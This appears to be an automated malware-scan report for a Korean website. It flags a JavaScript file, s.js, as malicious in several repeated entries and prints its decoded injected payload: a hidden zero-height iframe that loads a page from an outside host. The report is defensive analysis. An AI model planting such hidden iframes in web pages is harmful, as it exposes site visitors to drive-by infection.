Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yescook.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://yescook.co.kr/ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:24 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=BJEGIKBACHMFIIIHFBDABMDG; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/./s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/mem01.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:31 GMT Server: Microsoft-IIS/6.0 Content-Length: 79 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=HJEGIKBAKCPGKKCJAOJFEIHI; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../member/login_scr.asp?tag=login | 200 OK Content-Length: 17079 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../member/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/../default.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:35 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=LJEGIKBABAKLFNCMELGJJNML; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../htm/../default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../htm/.././s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/../ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:40 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=PJEGIKBAPJGMCMKODAAMKLOF; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://yescook.co.kr/htm/sitemap.htm | 200 OK Content-Length: 38014 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../default.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:48 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=CKEGIKBAKCEFODFIMBPLKKPM; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../default.asp | 200 OK Content-Length: 36321 Content-Type: text/html | clean |
http://yescook.co.kr/htm/.././s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../ | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:53 GMT Server: Microsoft-IIS/6.0 Content-Length: 57 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=IKEGIKBAHKLCBHEKHLPADFBH; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/info06.htm | HTTP/1.1 200 OK Cache-Control: private Date: Thu, 24 Jul 2014 03:01:55 GMT Server: Microsoft-IIS/6.0 Content-Length: 78 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQRSRAQQ=JKEGIKBAJECFOCOBJBMCFPHK; path=/ X-Powered-By: ASP.NET | clean |
http://yescook.co.kr/htm/../bbs_news_file/bbs.asp?code=n6 | 200 OK Content-Length: 23966 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../bbs_news_file/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://yescook.co.kr/htm/../htm/info04_01.htm | 200 OK Content-Length: 24949 Content-Type: text/html | clean |
http://yescook.co.kr/htm/../htm/../s.js | 200 OK Content-Length: 8198 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i>a.length; i++) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}} } function MM_findObj(n, d) { var p, Mn55 = "/Member/Member_Email_Refuse.asp?mn=Mn55"; Mn56 = "/Member/ContactUs.asp?mn=Mn56"; Mn57 = "/Member/Member_Edit.asp?mn=Mn57"; Mn58 = "/Member/Cong_History.asp?mn=Mn58"; Mn59 = "/Member/Member_Secession.asp?mn=Mn59"; Mn5A = "/Member/Member_Legal_Notice.asp?mn=Mn5A"; Mn7 = "/Etc/Sitemap.asp?mn=Mn7"; Mn70 = "/Etc/Sitemap.asp?mn=Mn70"; function goURL(name) { document.location.href = name; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yescook.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 24 Jul 2014 03:01:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 57
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRSRAQQ=BJEGIKBACHMFIIIHFBDABMDG; path=/
X-Powered-By: ASP.NET
...57 bytes of data.
GET / HTTP/1.1
Host: yescook.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 24 Jul 2014 03:01:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 57
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQRSRAQQ=BJEGIKBACHMFIIIHFBDABMDG; path=/
X-Powered-By: ASP.NET
...57 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yescook.co.kr
Referer: http://www.google.com/search?q=yescook.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yescook.co.kr
Referer: http://www.google.com/search?q=yescook.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.